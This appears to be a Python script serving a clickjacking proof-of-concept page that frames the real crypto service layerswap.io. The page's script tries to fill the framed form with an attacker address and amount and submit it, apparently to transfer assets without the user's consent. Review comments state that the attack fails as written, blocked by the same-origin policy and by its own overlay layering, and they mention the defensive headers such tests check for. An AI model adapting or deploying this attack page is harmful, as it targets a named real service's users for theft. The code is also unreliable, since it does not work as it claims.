layerclick2.py
from http.server import BaseHTTPRequestHandler, HTTPServer
# HTML served for the clickjacking proof-of-concept: one page holding a
# full-viewport <iframe> of the target site, a semi-transparent overlay on top
# of it, and a single visible "Click Me!" button. RequestHandler.do_GET sends
# this literal verbatim for every request path.
#
# NOTE(review): as written this page does not demonstrate a working clickjack,
# and a reader should not take the inline script as evidence that it does:
#   - the iframe loads a third-party origin, so the script's
#     `contentWindow.document` access in redirect() is blocked by the browser's
#     same-origin policy and throws a SecurityError; no field inside the frame
#     is read, filled or submitted. The `input[name="address"]`/`input[name="amount"]`
#     selectors are assumptions about the framed page, not something verified here.
#   - the overlay (z-index 2) and the button (z-index 3) are stacked above the
#     iframe (z-index 1), so the user's click lands on the overlay/button and
#     never reaches the framed page. Clickjacking depends on the click reaching
#     the frame; this layout guarantees it cannot.
#   - the frame renders at all only if the target omits `X-Frame-Options` /
#     CSP `frame-ancestors`; those response headers are the defenses this kind
#     of PoC exists to check for.
#   - the #message div is `display:none` and nothing in the page ever shows it.
# Everything below is a runtime string: do not edit it for wording, only for
# behaviour you intend to change.
html_code: str = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Clickjacking Attack</title>
<style>
body {
margin: 0;
padding: 0;
overflow: hidden;
}
iframe {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
border: none;
z-index: 1;
}
.overlay {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
background: rgba(0, 0, 0, 0.5); /* semi-transparent background */
z-index: 2;
display: flex;
align-items: center;
justify-content: center;
}
.message {
color: white;
font-size: 24px;
text-align: center;
}
.button-container {
position: absolute;
top: 50%;
left: 50%;
transform: translate(-50%, -50%);
z-index: 3;
}
.button-container button {
padding: 10px 20px;
font-size: 18px;
cursor: pointer;
}
</style>
</head>
<body>
<iframe src="https://www.layerswap.io/app"></iframe>
<div class="overlay">
<div class="button-container">
<button onclick="redirect()">Click Me!</button>
</div>
</div>
<div class="message" id="message" style="display:none;">You have been clickjacked by DeadmanXXXII</div>
<script>
function redirect() {
// Simulate a form submission that leads to an unauthorized transfer of assets
document.querySelector('iframe').contentWindow.document.querySelector('input[name="address"]').value = 'attacker-address';
document.querySelector('iframe').contentWindow.document.querySelector('input[name="amount"]').value = '1000';
document.querySelector('iframe').contentWindow.document.querySelector('form').submit();
}
</script>
</body>
</html>
"""
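# HTTP request handler: every GET, whatever the path, gets the PoC page.
class RequestHandler(BaseHTTPRequestHandler):
    """Serve the module-level `html_code` page for any request path."""

    def do_GET(self):
        """Answer a GET with 200 and the static `html_code` body.

        There is no routing: every path returns the same page. The body is
        encoded as UTF-8, so the Content-Type now declares that charset
        (the original omitted it and left the client to guess), and
        Content-Length is sent so the client knows where the body ends
        without waiting for the connection to close.
        """
        body = html_code.encode("utf-8")
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)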
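# Bind the listening socket and serve until interrupted.
def start_server(host="0.0.0.0", port=8000):
    """Serve the PoC page over plain HTTP until the process is interrupted.

    Args:
        host: Interface to bind. The default keeps the original behaviour of
            listening on every interface, which exposes the page to anyone who
            can reach this machine on the network; pass "127.0.0.1" when you
            only need to open it in a local browser.
        port: TCP port to listen on (8000, as before).

    Blocks inside serve_forever(). The socket is closed on the way out (for
    example after Ctrl-C) so the port is released promptly; the interrupt
    itself still propagates to the caller as it did before.
    """
    httpd = HTTPServer((host, port), RequestHandler)
    print(f"Server started on http://{host}:{port}")
    try:
        httpd.serve_forever()
    finally:
        httpd.server_close()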
if __name__ == "__main__":
    # Entry point: only bind the port when run as a script, never on import.
    start_server()